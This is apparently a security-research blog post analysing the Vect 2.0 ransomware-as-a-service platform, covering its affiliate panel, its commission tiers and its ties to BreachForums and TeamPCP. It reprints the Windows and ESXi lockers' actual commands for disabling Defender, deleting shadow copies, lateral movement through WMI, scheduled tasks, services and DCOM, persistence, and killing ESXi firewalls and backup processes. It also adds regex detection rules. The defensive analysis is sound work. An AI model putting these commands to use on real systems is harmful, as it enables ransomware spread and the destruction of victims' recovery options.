Executive Summary

It's hard to remember the days before everyone was jumping on the AI bandwagon, times when people were rushing to build a SaaS platform. These big shifts in adoption often have their shadow counterparts which we as security professionals document and deal with day to day. Scoundrels of all sorts are making their own service structures and pipelines... but for evil!

As we have seen the proliferation of ransomware throughout the last few years, we are starting to see the bad guys build robust ransomware offerings in the SaaS space. Vect ransomware has published and started marketing a ransomware-as-a-service (RaaS) platform at breakneck speed, which we will infiltrate and kick the tires on in this blog post.

Vect's RaaS release has entered the criminal services domain with the proliferation of its use by TeamPCP. So, it would behoove us to take a peek at its internals, highlight how these threat actors interact with the platform, easily build ransomware encryptors, execute attack campaigns, communicate with their victims, and perform operations on the platform day-to-day.

Additionally, as part of this research, we were able to obtain and analyze Vect 2.0 ransomware lockers to provide insight into advanced capabilities of the Vect ransomware toolkit, such as persistence, automated lateral movement for deployment, and EDR evasion techniques.

Deeper analysis of the Vect group and its associated RaaS platform provides:

  • Affiliate recruitment strategies and a growing focus on public reputation

  • Visibility into a polished and optimized platform built to enable ransomware affiliates

  • Vect 2.0 affiliate reward systems, including earnings and commission structures

  • Integrated communication and ticketing systems to manage victims and operations

  • On-demand locker builds that speed up deployment and reduce barrier to entry

  • ESXi-targeted builds designed to disable firewalls and hypervisor functionality


Overview of Vect and Emerging Alliances

Vect ransomware, now officially renamed to Vect 2.0, is an emerging RaaS affiliate program that surfaced in early January 2026 and has steadily gained notoriety. In early January 2026, someone using the alias Vect was observed on the cybercriminal community BreachForums featuring a new ransomware variant and affiliate program. The post advertised a fully custom C++ ransomware locker made from scratch, with a feature set spanning cross-platform encryption, LAN pivoting (lateral movement), and a TOR-hosted affiliate panel available to prospective affiliates for a $250 registration fee.

Figure 1: Vect Ransomware Affiliate Post

In mid-February 2026, Vect issued a new post on BreachForums announcing Vect 2.0, claiming the locker had been completely rebuilt with improved encryption speed, full ESXi support, and enhanced Windows and Linux compatibility. The post (provided below) included messaging that the group was actively recruiting “penetration testers” and initial access specialists to support an expanded double-extortion operation.

Figure 2: Vect 2.0 Release Post

Vect's rise has also been fueled by a formal partnership with BreachForums (v6) administrators. This endorsement by what is believed to be an English-speaking threat collective carries significant weight within the criminal community. To formalize the partnership, forum admins announced free Vect affiliate keys for members who have reached specified paid tiers on the platform, shown in the post below.

Figure 3: Vect share they are giving free keys to certain ranks

Beyond this partnership, Vect has signaled a willingness to affiliate with actors operating within the Commonwealth of Independent States (CIS), such as Russia and Belarus. This may be an attempt to attract established operators and expand access into victim networks.

Figure 4: Vect share they are giving free keys to certain ranks

In other efforts to enhance their brand and reach, Vect publicly announced plans to align with TeamPCP, a group that has recently made headlines due to several high-profile supply chain attacks targeting the developer ecosystem. Between March 19th and March 27th, TeamPCP executed a series of attacks across five vendor ecosystems in rapid succession, attacking Aqua Security Trivy on March 19th, Checkmarx KICS on March 21st, BerriAI’s LiteLLM Python project on March 23rd, and Telnyx's Python SDK on PyPI on March 27th.

TeamPCP’s attacks weaponized compromised workloads, including poisoning Trivy security tooling to trickle malicious code into environments and harvest credentials downstream. The stolen credentials and tokens were used to poison Continuous Integration / Continuous Deployment (CI/CD) pipelines and publish malicious versions of other commonly used developer packages, with payloads designed to identify additional secrets and amplify impact of the attack. As an example, the LiteLLM compromise alone was linked to hundreds of thousands of stolen credentials, with researchers estimating approximately 300 GB of compressed data exfiltrated across the campaign.

The BreachForums post below surfaced announcing a partnership between TeamPCP and Vect, with plans to jointly deploy ransomware against organizations affected by the recent supply chain attacks. The first confirmed Vect deployment believed to be using TeamPCP-sourced credentials followed shortly after.

Figure 5: Announcement of the partnership

In the same post, Vect announced, “Together, we are going to build something huge,” doubling down that, regardless of standing, all users on BreachForums would be eligible to get a free affiliate key and receive support to operate Vect ransomware.

In April 2026, a BreachForums administrator operating under the alias diencracked announced the distribution of Vect affiliate keys to all registered users on the forum, reflecting a deeper level of integration between the ransomware operation and the BreachForums community. The announcement accompanied a series of backend and security improvements to the forum itself, including stronger input validation, enhanced anti-injection and anti-XSS protections, rate limiting, and anomaly detection to reduce brute-force attempts and suspicious traffic.

Figure 6: Announcement Of Vect Keys Being Distributed

On April 17, 2026, BreachForums users began receiving automated direct messages containing their Vect access keys alongside auto-generated login credentials, marking the beginning of the actual distribution phase. The process appeared to be fully automated and executed at scale, with keys assigned and delivered in bulk through accounts linked directly to forum profiles.

Figure 7: Direct Message Providing Vect Keys To Users

Inside The Vect RaaS Affiliate Panel

Beazley Security Labs obtained insider visibility into the proposed Vect 2.0 RaaS panel, allowing us to document what day-to-day operations might look like for an affiliate. The panel provides a polished interface and structured workflows to match, rather than a repurposed copypasta-code backend that some might expect from a newer operator. At the time of writing, the platform is exclusively accessible through TOR with no clearnet presence.

Operational workflow and resources are organized into three core functional areas detailed below: Operations, Communication, and Account Management. The sidebar navigation exposes a Dashboard, Builder, Earnings, Chat, Tickets, Announcements, FAQ, Rules, Settings, and a public profile page, covering the full operational lifecycle an affiliate needs from payload generation through to payout.

Earnings and Commission Structure

The Earnings section tracks affiliate performance across six metrics displayed at the top of the page: Level, Commission Rate, Total Earned, Available Balance, Pending, and Paid Out.

The commission tier structure is laid out within the panel in a gamified leveling experience, outlining what high-performing operators can expect to gain.

Figure 8: Vect 2.0 Affiliate Panel — Earnings Overview

Commission starts at 80% for Level 1 affiliates and scales upward as ransom totals accumulate. Payouts are supported in both Bitcoin and Monero, with a minimum payout threshold of $1,000, and wallet addresses are configured directly within the panel.

Level   Revenue Threshold   Affiliate Share   Panel Share
1       $0+                 80%               20%
2       $5,000,000          82%               18%
3       $15,000,000         84%               16%
4       $35,000,000         86%               14%
5       $75,000,000         88%               12%

Building the Locker

The Builder section is where affiliates generate their deployment-ready payloads to stage and weaponize the locker within a victim’s environment. Each victim case is tied to a unique Chat ID, automatically linking the compiled binary to a corresponding negotiation session in the panel.

Figure 9: Vect 2.0 Affiliate Panel — Windows Builder

The builder exposes four tabs: Windows, Linux, ESXi, and Exfil. The Windows builder features configurable exclusions for file extensions or folder paths and includes a GPO Credentials field. The Credentials field allows an attacker to embed domain credentials in the compiled locker payload, which enables automated lateral movement and mass deployment via GPO without requiring additional tooling.

The Linux and ESXi builder tabs follow a simpler configuration model. Each exposes a single toggle to enable an MOTD/Login Banner on compromised hosts, which could be leveraged to display attacker-controlled messaging at login. Both tabs present a dedicated build button that compiles and returns a platform-specific locker:

Figure 10: Vect 2.0 Affiliate Panel — Linux Builder

Affiliate Communications and Support

The panel includes a full communication and support infrastructure, indicating the Vect RaaS authors have put effort into providing affiliates an easy path for assistance and operations:

  • The Chat section provides private messaging between affiliates and panel operators, serving as a primary channel for alignment, troubleshooting, and negotiation handoffs.

  • The Tickets section implements a formal support ticketing system and is consistent with 24/7 support the group advertised in recruitment posts. The capability provides affiliates a structured way to report issues and receive assistance rather than relying on ad hoc communication.

  • The Rules section lays out the program's terms of engagement, covering expected conduct, prohibited targets, and operational guidelines affiliates are expected to follow. The presence of a formal ruleset is a common development in mature RaaS programs, giving operators a basis to remove or sanction affiliates who depart from the group’s interests.

  • The Announcements section provides operators a broadcast channel to push updates, new feature releases, and operational guidance to the entire affiliate base simultaneously.

Robust communication features demonstrate a move to reduce friction amongst Vect’s userbase and provide an almost professional level of community support within the RaaS offering itself to facilitate a growing pool of affiliates at scale.

Vect Locker Analysis and Capability

Vect RaaS operators have attempted to control access to their ransomware locker by warning affiliates not to create test builds without a defined target, likely in an effort to discover and ban security researchers such as ourselves. While we were able to gather private samples for analysis, we did not want to risk our source's access, and instead used the samples to fingerprint already public Vect 2.0 submissions on VirusTotal for reverse engineering the locker:

Win64: 207b1a60f803d348c795d382f5aed9c3, aa72609186042f1d7d01ce070306a9f2

ESXi: 7f6864cf9c616b92898ca92b47c81d1f

Windows 64-bit Locker

Of the two public Windows 64-bit locker samples we found, one has submission telemetry closely correlating it to a specific victim that was previously reported on the Vect leak site. Dynamic analysis of the samples reveals typical locker behaviors.

The binary provides a familiar help dialog for its affiliate operators:

VECT 2.0
-h, --help Help
-v, --verbose Verbose output
-p, --path <dir> Target specific path
-c, --creds <b64> Override credentials
--gpo Enable GPO spread (default: on)
--no-gpo Disable GPO spread
--mount Enable network mount (default: on)
--no-mount Disable network mount
--stealth Enable self-delete (default: on)
--no-stealth Disable self-delete
--force-safemode Force safemode boot

Persistence is obtained by modifying this common registry run key on a victim’s system:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Name: <locker file name>
Value: <locker file path>

The locker also issues commands to subvert Windows Defender via this PowerShell command, observed during analysis:

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableScriptScanning $true"

The above command attempts to turn off real-time protection against scripts and files, while disabling real-time scanning and behavioral monitoring.

Backup copies from the Windows volume shadow copy utility are deleted with this command:

vssadmin delete shadows /all /quiet

As documented above, the Vect locker advertises automated lateral movement and deployment via GPO on Windows. We discovered a few built-in methods that attempt this, and the functionality appears to be implemented via hardcoded PowerShell scripts embedded within the locker.

Each method begins by setting up credentials (either hardcoded or supplied at the command line):

$cred=New-Object PSCredential($u,$sp)

It then enumerates hosts via AD:

$pcs=@([adsisearcher]'objectCategory=computer').FindAll()|%{$_.Properties.dnshostname[0]}|?{$_ -and $_ -ne $env:COMPUTERNAME}

Next, it copies itself to discovered machines:

Copy-Item $src $dest -Force -EA Stop

Then it attempts to execute the remote copy via various methods, including WMI:

Invoke-WmiMethod -ComputerName $pc -Credential $cred -Class Win32_Process -Name Create -ArgumentList "%ProgramData%\$name" -EA Stop

It can also execute via CIM:

Invoke-CimMethod -CimSession $sess -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="%ProgramData%\$name"} -EA Stop

Or through scheduled tasks:

$action=New-ScheduledTaskAction -Execute "%ProgramData%\$name" 
$principal=New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest 
$task=New-ScheduledTask -Action $action -Principal $principal 
$sess=New-CimSession -ComputerName $pc -Credential $cred -EA Stop 
Register-ScheduledTask -CimSession $sess -TaskName $tn -InputObject $task -Force -EA Stop|Out-Null 
Start-ScheduledTask -CimSession $sess -TaskName $tn -EA Stop

Through static analysis of the payload, we also discovered other hard-coded methods, included here for completeness. Methods include propagating via service installation:

sc.exe \\\\$pc create $svc binPath= \"C:\\ProgramData\\$name\" type= own start= auto 2>$null
sc.exe \\\\$pc start $svc 2>$null
sc.exe \\\\$pc delete $svc 2>$null

From scheduled tasks installed via the command line:

schtasks /create /s $pc /u $u /p $p /tn $tn /tr \"C:\\ProgramData\\$name\" /sc once /st 00:00 /ru SYSTEM /f 2>$null
schtasks /run /s $pc /u $u /p $p /tn $tn 2>$null
schtasks /delete /s $pc /u $u /p $p /tn $tn /f 2>$null

From DCOM:

$com=[activator]::CreateInstance([type]::GetTypeFromProgID('MMC20.Application',$pc))
$com.Document.ActiveView.ExecuteShellCommand(\"C:\\ProgramData\\$name\",$null,$null,'7')

And finally, from basic command execution:

Invoke-Command -ComputerName $pc -Credential $cred -ScriptBlock {Start-Process \"C:\\ProgramData\\$using:name\"} -EA Stop

ESXi 64-bit Locker

The ESXi locker also provides an argument dialog showing its capabilities:

Options:

--path <dir> Target directory (default: /vmfs/volumes)
--spread Enable SSH lateral movement
--fast Fast mode: encrypt only 1MB
--medium Medium mode: encrypt 4 parts (64MB each)
--secure Secure mode: encrypt 100% (default)
--no-kill-vms Don't kill running VMs (encrypt only)
--verbose Enable verbose output
--help Show this help message

Vect executes the command `esxcli system process kill -p` on the following list of system processes:

dcbd, hostd, likewise, lwiod, ntpd, rabbitmqproxy, sensord, sfcb-vmware_base, slpd, smartd, snmpd, storageRM, vmfshba, vmkeventd, vmsyslogd, vmware-aam, vmware-fdm, vmware-usbarbitrator, vobd, vpxa, vsanmgmtd, vsansystem, wsman

The processes above cover a range of ESXi network and management capabilities, including remote logging (storageRM, vmkeventd, vmsyslogd, vobd), remote storage (vsanmgmtd, vsansystem), and availability management (vmfshba, vmware-aam).

These processes also manage AD functionality (likewise, lwiod), messaging middleware (rabbitmqproxy), CIM management (sfcb-vmware_base, slpd), and ethernet bridging (dcbd).

The ESXi locker also stops the following services via `esxcli system service stop -s`:

DCUI, TSM, TSM-SSH, hostd, lwsmd, ntpd, snmpd, vmsyslogd, vmware-aam, vmware-fdm, vpxa

These services mostly cover the same functionality mentioned above but also include the direct console user interface (DCUI), presumably to cut off one of the main methods to troubleshoot and recover an appliance.

Vect also disables the firewall via the following commands:

esxcli network firewall ruleset set --enabled false --ruleset-id sshServer
esxcli network firewall ruleset set --enabled false --ruleset-id vSphereClient
esxcli network firewall set --enabled false

And stops the following services via their entries in /etc/init.d:

DCUI, TSM, TSM-SSH, hostd, lwsmd, ntpd, snmpd, vmsyslogd, vmware-aam, vmware-fdm, vpxa

Additionally, Vect runs the following commands to disable GhettoVCB and Veeam software:

ps | grep -i ghettoVCB | grep -v grep | awk '{print $1}' | xargs kill -9
ps | grep -i veeam | grep -v grep | awk '{print $1}' | xargs kill -9
ps | grep -i veeamtransport | grep -v grep | awk '{print $1}' | xargs kill -9

GhettoVCB and Veeam are backup software systems. The Vect ESXi locker affects a wide array of core system processes but does not appear to do so in a targeted way. It appears more of an attempt to cut off all possible detection and recovery systems before it starts encrypting system files.
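As an added example that is not code from the original post or from Vect's toolkit, the following Python rules flag the command lines documented above for both lockers (Windows: Defender tampering, shadow copy deletion, WMI/CIM, scheduled-task, service and DCOM spreading; ESXi: esxcli process kills, service stops, firewall disabling and backup-agent kills) when they appear in process-creation or ESXi shell logs. The log lines, host names and file names in the sample are constructed.

```python
"""Added example (not from the original post): flag Vect 2.0 command lines
described in the analysis when they appear in process-creation (Sysmon-style)
or ESXi shell.log entries. Sample log lines below are constructed."""
import re
from typing import Dict, List, Tuple

# Rule name -> case-insensitive regex over the logged command line.
RULES: Dict[str, re.Pattern] = {
    # Windows locker: Defender tampering, shadow copy deletion, remote spread
    "defender_tamper": re.compile(
        r"Set-MpPreference\b.*-Disable(RealtimeMonitoring|BehaviorMonitoring|"
        r"IOAVProtection|ScriptScanning)\s+\$true", re.I),
    "shadow_delete": re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows\s+/all", re.I),
    "remote_wmi_exec": re.compile(
        r"Invoke-(Wmi|Cim)Method\b.*Win32_Process\b.*\bCreate\b", re.I),
    "remote_sched_task": re.compile(
        r"(schtasks\s+/create\s+/s\s+|Register-ScheduledTask\b.*-CimSession)", re.I),
    "remote_service": re.compile(r"sc(\.exe)?\s+\\\\\S+\s+create\b.*binPath=", re.I),
    "dcom_mmc20": re.compile(r"MMC20\.Application", re.I),
    # ESXi locker: process kills, service stops, firewall disable, backup kills
    "esxi_process_kill": re.compile(r"esxcli\s+system\s+process\s+kill\s+-p\b", re.I),
    "esxi_service_stop": re.compile(
        r"esxcli\s+system\s+service\s+stop\s+-s\s+(DCUI|TSM|TSM-SSH|hostd|vpxa)\b", re.I),
    "esxi_firewall_off": re.compile(
        r"esxcli\s+network\s+firewall\s+(ruleset\s+)?set\s+--enabled\s+false", re.I),
    "esxi_backup_kill": re.compile(
        r"grep\s+-i\s+(ghettoVCB|veeam)\b.*xargs\s+kill\s+-9", re.I),
}


def scan(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (rule_name, line) for each rule a log line matches, in log order."""
    hits: List[Tuple[str, str]] = []
    for line in lines:
        for name, rx in RULES.items():
            if rx.search(line):
                hits.append((name, line))
    return hits


# Constructed sample: four process-creation events (one benign) and three
# ESXi shell.log entries; host "FS01" and file "lk.exe" are made up.
SAMPLE_LINES = [
    'CommandLine: powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true"',
    "CommandLine: vssadmin delete shadows /all /quiet",
    "CommandLine: powershell -Command Invoke-WmiMethod -ComputerName FS01 -Class Win32_Process -Name Create -ArgumentList C:\\ProgramData\\lk.exe",
    "CommandLine: notepad.exe C:\\Users\\alice\\notes.txt",  # benign control line
    "2026-04-20T10:15:01Z shell[1001]: [root]: esxcli network firewall set --enabled false",
    "2026-04-20T10:15:02Z shell[1001]: [root]: esxcli system service stop -s DCUI",
    "2026-04-20T10:15:03Z shell[1001]: [root]: ps | grep -i veeam | grep -v grep | awk '{print $1}' | xargs kill -9",
]

if __name__ == "__main__":
    for rule, line in scan(SAMPLE_LINES):
        print(f"[{rule}] {line}")
```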

Conclusion

The emergence of Vect illustrates how quickly a motivated, modern ransomware operation can develop. In a matter of months, the group has progressed from recruitment activity to advertising a structured RaaS offering with purpose-built lockers, an affiliate panel, and tooling designed to support ransomware extortion and deployment campaigns in well-established criminal forums.

Vect’s focus on recruitment, reputation, and alliances with other well-known actors within criminal communities shows their desire for growth has paid off as their platform has become notorious in recent months. The group has positioned itself to be both accessible and credible in underground forums, and as a branded platform and operation, they’ve been able to produce an offering that’s appealing to threat actors.

The RaaS platform we demonstrated takes another step forward in commoditizing ransomware ecosystems, lowering both the operational and technical barriers for its users. Turnkey locker builds, standardized commission structures, and integrated extortion functionality allow operators with varying levels of skill to conduct ransomware operations with minimal ramp-up and setup.

Given the speed at which Vect has emerged and established credibility, continued monitoring of the group is warranted. This is evidenced by Vect’s efforts in partnering with other high-impact threat actors such as TeamPCP. These marketing efforts, paired with tooling enhancements, could rapidly amplify the group’s reach and impact in the near future.